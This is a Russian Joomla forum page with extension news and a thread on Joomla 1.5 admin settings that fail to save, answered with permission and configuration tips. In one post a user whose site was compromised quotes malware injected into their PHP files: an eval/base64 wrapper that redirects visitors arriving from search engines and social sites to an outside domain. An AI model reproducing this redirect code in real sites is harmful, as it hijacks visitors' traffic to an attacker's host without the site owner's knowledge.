Новости Joomla

Модификация WT JShopping products anywhere - Uikit макетИтак, дано: музыкальный журнал, в котором...

Модификация WT JShopping products anywhere - Uikit макетИтак, дано: музыкальный журнал, в котором...

Модификация WT JShopping products anywhere - Uikit макетИтак, дано: музыкальный журнал, в котором представлены новости, интервью, рецензии и есть небольшой магазин на JoomShopping. Возникла необходимость внутри Joomla статей вставлять упоминание релиза и кнопочку «добавить в корзину». Я взял плагин WT JShopping products anywhere Сергея Толкачева (@webtolkru). Плагин отображает название товара и ссылку. При помощи напильника, ИИ и навыков вёрстки появился Uikit макет для шаблонов на базе Yootheme Pro.Учитываается мобильная версия - телефоны и ipad.Кнопка добавления в корзину работает по Ajax и появляется всплывающее окно (Notification Bar от Uikit) с информацией.Пока это базовый вариант, требующий доведения до лоска, однако он уже работает и его можно применять на проектах.Взять макет можно здесь.А плагин вставки товаров в материалы можно забрать здесь.Приветствуется доведение до ума и оформление в виде PR.

WT Content Image Gallery v.1.2.3 - плагин галереи изображений для Joomla

WT Content Image Gallery v.1.2.3 - плагин галереи изображений для Joomla

👩‍💻 WT Content Image Gallery v.1.2.3 - плагин галереи изображений для Joomla.Пакет плагинов галереи изображений и видео для вставки в материалы и модули Joomla, а так же везде, где работают плагины группы content. Поддержка собственных макетов вывода для галерей. Смешанные фото+видео галереи. Плагин создан как замена Simple Image Gallery и поддерживает синтаксис {gallery}{/gallery}.👩‍💻 v.1.2.3. Что нового?- Обработка вступительного и полного текста для материалов Joomla. Добавлена обработка шорткодов в полном и вступительном текстах материалов Joomla.- Системные требования. Повышены минимальные требования до Joomla 5 и PHP 8.1.- Мелкие правки. Исправлена ошибка работы макета по умолчанию в плагине контента.- Joomla 6. Пакет плагинов успешно протестирован на Joomla 6.Страница расширения.GitHub расширенияJoomla Extensions Directory@joomlafeed#joomla #расширения

• 15 Ответов
  • 7104 Просмотров
*

Ульяна

• Новичок
  • 7
  • 0 / 0
версия: 1.5.9. Сайт- Общие настройки. Не сохраняет изменения.
То есть открывается страница, я что-то меня или не меняю, но если нажать на "Сохранить" или "применить" - то показывается пустая страница, в заголовке "Имя сайта"/administrator/index.php
И усе -  изменения не сохраняются...
Как бы исправить?

Случилось это после того, как я скопировала сайт с одного доменного имени на другое.
Во всем остальном похоже нормально работает.
*

zmancer

• Давно я тут
  • 519
  • 76 / 19
Скорее всего неправильно перенесли.
configuration.php доступен на запись?
правильно ли указаны пути к папкам tmp и logs в вашем configuration.php?
Обычно такое бывает из-за ошибках в этих двух пунктах.
*

Ульяна

• Новичок
  • 7
  • 0 / 0
Скорее всего неправильно перенесли.
configuration.php доступен на запись?
правильно ли указаны пути к папкам tmp и logs в вашем configuration.php?
Обычно такое бывает из-за ошибках в этих двух пунктах.
проверила -  похоже пути прописаны правильно.
на configuration.php выставила максимальный доступ -  ситуация не изменилась...
где еще искать ошибку?
*

Ульяна

• Новичок
  • 7
  • 0 / 0
Кстати, еще...
Я посмотрела -  на старом сайте -  с которого копию делала -  та же проблема.
Но точно был момент когда этой проблемы не было.
Так как изменения там я делала и они сохранились.
Я название сайта меняла. Но как я это делала -  я не помню:)

И еще...
У меня есть задача, которую я хочу решить с помощью этого меню. Возможно её можно решить иначе.
У меня на самом верхнем баннере на сайте прописано то, что указано на это неработающей странице -  а именно -  название сайта. Его хочу совсем убрать.
И на главной странице вверху написано: Home, а под ним снова тоже самое название сайта  - вот бы поменять на другое название, а слово home -  вообще убрать...
Это можно как-то сделать не починив эту менюшку?
*

rembot

• Захожу иногда
  • 101
  • 2 / 0
  • +++
Такая же проблема, настройки не сохраняются, и белый экран. Кто-нибудь знает как решить?
*

Efanych

• Глобальный модератор
  • 4683
  • 644 / 0
  • Меняю свою жизнь на 360°!
версия: 1.5.9
Это очень старая версия. Банально может глючить из-за версии php на хостинге.
Создание сайтов, шаблонов, помощь в решении проблем.
*

rembot

• Захожу иногда
  • 101
  • 2 / 0
  • +++
У меня версия 1.5.20, хостинг Мастерхост, эта версия устанавливается прямо с сайта, так что не думаю что она моросит.
*

rembot

• Захожу иногда
  • 101
  • 2 / 0
  • +++
Не подскажите до какой версии движок обновить? Какая наиболее стабильна сейчас?
*

Efanych

• Глобальный модератор
  • 4683
  • 644 / 0
  • Меняю свою жизнь на 360°!
Создание сайтов, шаблонов, помощь в решении проблем.
*

rembot

• Захожу иногда
  • 101
  • 2 / 0
  • +++
Сейчас обнаружил что сайт заражен вирусом. В файлы с расширением .php добавлен код примерно следующего содержания:
Код
eval(base64_decode(
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://happynewyear.345.pl/");
exit();
}
}
}
}

Не знаю связана ли моя проблема с этим, сейчас буду менять пароли FTP, обновлю движок, и сидеть чистить файлы.
*

Olinda

• Захожу иногда
  • 71
  • 1 / 0
У меня та же проблема, только с новым сайтом, Joomla свежеустановленна 1.5.25, вирусов нет...

*

freya

• Новичок
  • 2
  • 0 / 0
Установила 1.5.14. У меня не сохраняются общие настройки сайта. В коде страницы изменения сохраняются, а вот при анализе сайта и в Google прописываются стандартные описание и ключевые слова Joomla. Как так может быть? Код страниц один, а распознавание сайта другое. В конфигурационном сайте все мной исправлено, никаких упоминаний Joomla и вдруг при анализе стандартные описание и клячевые слова.
*

mobidik72

• Новичок
  • 3
  • 0 / 0
версия: 1.5.9. Сайт- Общие настройки. Не сохраняет изменения.
То есть открывается страница, я что-то меня или не меняю, но если нажать на "Сохранить" или "применить" - то показывается пустая страница, в заголовке "Имя сайта"/administrator/index.php
И усе -  изменения не сохраняются...
Как бы исправить?

Случилось это после того, как я скопировала сайт с одного доменного имени на другое.
Во всем остальном похоже нормально работает.
Такая же история. Кто-нибудь решил эту проблему? Вообще ветка форума еще жива?
*

Aleks_El_Dia

• Живу я здесь
  • 3671
  • 353 / 0
  • AEDStudio Joomla! Direction

Такая же история. Кто-нибудь решил эту проблему? Вообще ветка форума еще жива?
Жива. Проверьте права на все необходимые папки (Помощь - Информация о системе - Права на папки)
Спам придумали боги в отместку за наши молитвы (с) Рома Воронежский
На молоко: Z369038872422 || R210017695494 || U247040729215 || ЯД 410011288250383
Мигрирую сайты, переношу расширения J!1.0->J!1.5->J!2.5. Более 50 успешных миграций.
*

mobidik72

• Новичок
  • 3
  • 0 / 0
Жива. Проверьте права на все необходимые папки (Помощь - Информация о системе - Права на папки)
Проверил, все папки с правами "Доступен на запись".
*

Aleks_El_Dia

• Живу я здесь
  • 3671
  • 353 / 0
  • AEDStudio Joomla! Direction
Проверил, все папки с правами "Доступен на запись".
Поищите по форуму "Белая страница" - много раз обсуждалось. Необходимо включить показ ошибок.
Спам придумали боги в отместку за наши молитвы (с) Рома Воронежский
На молоко: Z369038872422 || R210017695494 || U247040729215 || ЯД 410011288250383
Мигрирую сайты, переношу расширения J!1.0->J!1.5->J!2.5. Более 50 успешных миграций.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться

Не открываются "Общие настройки" в админке

Автор guryshkina

Ответов: 0
Просмотров: 4271
Последний ответ 23.12.2020, 14:41:08
от guryshkina
Как поставить на сайт live-ставки?

Автор dlink08

Ответов: 4
Просмотров: 5914